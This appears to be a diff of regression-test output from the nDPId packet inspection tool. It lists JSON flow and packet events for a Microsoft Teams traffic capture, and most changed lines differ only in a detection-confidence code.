00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1587041682369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682369,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex\/Abv2sXoGAAAAALAC\/\/+1wwAAAgQFtAEDAwUBAQgKMISugAAAAAAEAgAA"} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1587041682370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1587041682370,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdUKtAADkRbU3AqAEBwKgBBgA1\/2sAiQAAEDqBgAABAAIAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQABwAwABQABAAAA5AAyEW5vcnRoZXVyb3BlY25zLTMyC25vcnRoZXVyb3BlCGNsb3VkYXBwBWF6dXJlA2NvbQDAPwABAAEAAAAEAAQ0ckww"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682376,"flow_last_seen":1587041682376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682376,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1587041682376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682376,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+GfAqAEGNHJMMOyAAbuusi7sAAAAALAC\/\/9JyAAAAgQFtAEDAwUBAQgKMISuhQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682420,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8cKZAAGwGWtQ0ck0hwKgBBgG77H8VHmMl9rF6B6ASIAAZOgAAAgQFoAEDAwgEAggKYQa0RDCEroA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682420,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex\/Abv2sXoHFR5jJoAQEAlXvgAAAQEICjCErqxhBrRE"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682423,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0HMFAAGwGr7I0ckwwwKgBBgG77ICUvjjErrIu7YAS\/\/+TZQAAAgQFoAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG+H\/AqAEGNHJMMOyAAbuusi7tlL44xVAQIAC0JAAA"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587041682440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041682440,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES9AAEARZ+LAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAHT\/ICoAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00889{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1160,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041682376,"flow_last_seen":1587041682467,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1688,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041682467,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041682611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041682598,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1587041682668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041682668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABW2rQAAP8RXYrAqAEGwKgBAeC6ADUAQqKILzcBAAABAAAAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1587041682697,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1587041682697,"pkt":"KDc3AG3IEBMx8Tl2CABFAACny9dAADkR8hbAqAEBwKgBBgA14LoAkwAALzeBgAABAAIAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAASwANRRhLXVwcy1wcmVzZW5jZTQtcHJvZAtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AwEYAAQABAAAABgAENHJNOg=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682698,"flow_last_seen":1587041682698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682698,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1587041682698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682698,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG913AqAEGNHJNOuyBAbtgCOGqAAAAALAC\/\/\/jdgAAAgQFtAEDAwUBAQgKMISvtwAAAAAEAgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1587041682740,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEdws9AADEGDl2ifRODwKgBBgG767gSqyGfi6a7DoAYAWi65wAAAQEICpHNoqswhBBbFwMDAOQAAAAAAAAACKmKftpP18TObpudfRHF+x2Q26rJbEiP394UtjZJPj4wSIR\/hp3JlNrAGtpUw45IgQ+\/Td3gBgwIaydoMxwS3i93S6aIvQahVpj\/c5RwIn5XTgvMLlxphbaNgBQKVcUBzOyFCFmX25bboaZrE8yGPewBV8YF9rPw3wiL2qX6gOrVwGBD+SxN5WBWFI2hGO+JWJUmRSYMjHC+44xSTFiyxGwuYeySW1fNosn1ZrrnxmEfRHvkqjQUYvkmRW87MNYmA\/nzpUUAJUjx7fyAlsSNV0cWWtSO31yX1lU5orE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1587041682740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682740,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwxXAqAEGon0Tg+u4AbuLprsOEqsiiIAQD\/hw3AAAAQEICjCEr+CRzaKr"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA09YRAAGwG1eQ0ck06wKgBBgG77IG+FZNKYAjhq4AS\/\/+qaAAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG93XAqAEGNHJNOuyBAbtgCOGrvhWTS1AQIADLJwAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 